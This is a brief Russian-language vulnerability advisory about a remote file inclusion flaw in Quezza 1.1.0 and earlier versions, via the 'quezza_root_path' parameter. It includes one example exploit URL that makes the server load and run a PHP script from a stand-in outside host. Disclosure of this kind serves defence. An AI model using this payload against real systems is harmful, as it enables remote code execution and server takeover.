Программа: Quezza 1.1.0 и более ранние версии.

Уязвимость позволяет удаленному пользователю выполнить произвольный код на
целевой системе. Уязвимость существует из-за недостаточной обработки входных
данных в параметре "quezza_root_path" в сценарии includes/class_template.php.
Удаленный пользователь может с помощью специально сформированного запроса
выполнить произвольный PHP сценарий на целевой системе с привилегиями Web
сервера. Для удачной эксплуатации уязвимости опция "register_globals" должна
быть включена.

Пример:

http://[victim]/[QuezzaPath]/includes/class_template.php? quezza_root_path=http://yourhost.com/cmd.txt?

 

  • Подпишись на наc в Telegram!

    Только важные новости и лучшие статьи

    Подписаться

  • Подписаться
    Уведомить о
    0 комментариев
    Межтекстовые Отзывы
    Посмотреть все комментарии